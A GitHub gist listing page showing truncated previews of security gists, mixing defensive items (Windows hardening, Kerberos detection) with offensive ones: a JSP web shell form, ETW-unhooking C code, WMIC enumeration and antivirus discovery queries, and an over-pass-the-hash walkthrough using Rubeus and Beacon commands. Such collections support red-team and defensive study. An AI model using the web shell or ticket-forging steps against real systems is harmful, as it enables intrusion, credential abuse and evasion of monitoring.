dev2null dev-2null
dev-2null
/ windows_hardening.cmd
Created
November 21, 2022 06:34
— forked from mackwage/windows_hardening.cmd
Script to perform some hardening of Windows OS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| :: Windows 10 Hardening Script | |
| :: This is based mostly on my own personal research and testing. My objective is to secure/harden Windows 10 as much as possible while not impacting usability at all. (Think being able to run on this computer's of family members so secure them but not increase the chances of them having to call you to troubleshoot something related to it later on). References for virtually all settings can be found at the bottom. Just before the references section, you will always find several security settings commented out as they could lead to compatibility issues in common consumer setups but they're worth considering. | |
| :: Obligatory 'views are my own'. :) | |
| :: Thank you @jaredhaight for the Win Firewall config recommendations! | |
| :: Thank you @ricardojba for the DLL Safe Order Search reg key! | |
| :: Thank you @jessicaknotts for the help on testing Exploit Guard configs and checking privacy settings! | |
| :: Best script I've found for Debloating Windows 10: https://github.com/Sycnex/Windows10Debloater | |
| : |
dev-2null
/ KerberosCorrelation.ipynb
Created
August 16, 2022 07:40
— forked from jsecurity101/KerberosCorrelation.ipynb
Kerberos Detection/Investigation
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
dev-2null
/ unmanaged_dotnet_unhook_etw.c
Created
July 22, 2022 06:22
— forked from xpn/unmanaged_dotnet_unhook_etw.c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <Windows.h> | |
| #include <MSCorEE.h> | |
| #include <MetaHost.h> | |
| #include <evntprov.h> | |
| int main() | |
| { | |
| ICLRMetaHost* metaHost = NULL; | |
| IEnumUnknown* runtime = NULL; |
dev-2null
/ clr_via_native.c
Last active
July 17, 2024 08:42
— forked from xpn/clr_via_native.c
A quick example showing loading CLR via native code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| int main() | |
| { | |
| ICLRMetaHost *metaHost = NULL; | |
| IEnumUnknown *runtime = NULL; | |
| ICLRRuntimeInfo *runtimeInfo = NULL; | |
| ICLRRuntimeHost *runtimeHost = NULL; | |
| IUnknown *enumRuntime = NULL; | |
| LPWSTR frameworkName = NULL; |
dev-2null
/ KDCProxy.ps1
Created
February 18, 2022 07:56
— forked from jborean93/KDCProxy.ps1
Functions to help set up a KDC proxy server and add client proxy servers - https://syfuhs.net/kdc-proxy-for-remote-access
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Copyright: (c) 2022, Jordan Borean (@jborean93) <[email protected]> | |
| # MIT License (see LICENSE or https://opensource.org/licenses/MIT) | |
| Function Install-KDCProxyServer { | |
| <# | |
| .SYNOPSIS | |
| Set up a KDC Proxy server. | |
| .DESCRIPTION | |
| Sets up the KDC proxy server on the current host. |
dev-2null
/ Get-RBCD.ps1
Last active
March 3, 2022 02:27
Powershell one liner to retrieve RBCD information with security descriptors resolved
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ([adsisearcher]::new(([adsi]"LDAP://OU=OU,DC=domain,DC=net"),"(msDS-AllowedToActOnBehalfOfOtherIdentity=*)")).FindAll()| ForEach-Object {$_.Properties["distinguishedname"]; ConvertFrom-SddlString (New-Object Security.AccessControl.RawSecurityDescriptor([byte[]]$_.Properties["msds-allowedtoactonbehalfofotheridentity"][0],0)).GetSddlForm([Security.AccessControl.AccessControlSections]::Access) | select DiscretionaryAcl|fl} |
dev-2null
/ wmic_cmds.txt
Created
November 3, 2020 14:23
— forked from xorrior/wmic_cmds.txt
Useful Wmic queries for host and domain enumeration
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Host Enumeration: | |
| --- OS Specifics --- | |
| wmic os LIST Full (* To obtain the OS Name, use the "caption" property) | |
| wmic computersystem LIST full | |
| --- Anti-Virus --- | |
| wmic /namespace:\\root\securitycenter2 path antivirusproduct |
dev-2null
/ cmd.jsp
Created
May 25, 2020 09:59
— forked from ErosLever/cmd.jsp
A simple and minimal yet effective JSP Web Shell that escapes command output as HTML entities as needed.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <form method="GET" action=""> | |
| <input type="text" name="cmd" /> | |
| <input type="submit" value="Exec!" /> | |
| </form> <%! | |
| public String esc(String str){ | |
| StringBuffer sb = new StringBuffer(); | |
| for(char c : str.toCharArray()) | |
| if( c >= '0' && c <= '9' || c >= 'A' && c <= 'Z' || c >= 'a' && c <= 'z' || c == ' ' ) | |
| sb.append( c ); | |
| else |
dev-2null
/ Get-KerberosTicketGrantingTicket.ps1
Created
March 4, 2020 13:39
— forked from jaredcatkinson/Get-KerberosTicketGrantingTicket.ps1
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-KerberosTicketGrantingTicket | |
| { | |
| <# | |
| .SYNOPSIS | |
| Gets the Kerberos Tickets Granting Tickets from all Logon Sessions | |
| .DESCRIPTION | |
| Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets. |
dev-2null
/ gist:78c36568aed5dca143d4166016bb259f
Created
March 3, 2020 11:22
— forked from HarmJ0y/gist:dc379107cfb4aa7ef5c3ecbac0133a02
Over-pass-the-hash with Rubeus and Beacon
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##### IF ELEVATED: | |
| # grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X) | |
| beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH | |
| # decode the base64 blob to a binary .kirbi | |
| $ base64 -d ticket.b64 > ticket.kirbi | |
| # sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT) | |
| beacon> make_token DOMAIN\USER PassWordDoesntMatter |
NewerOlder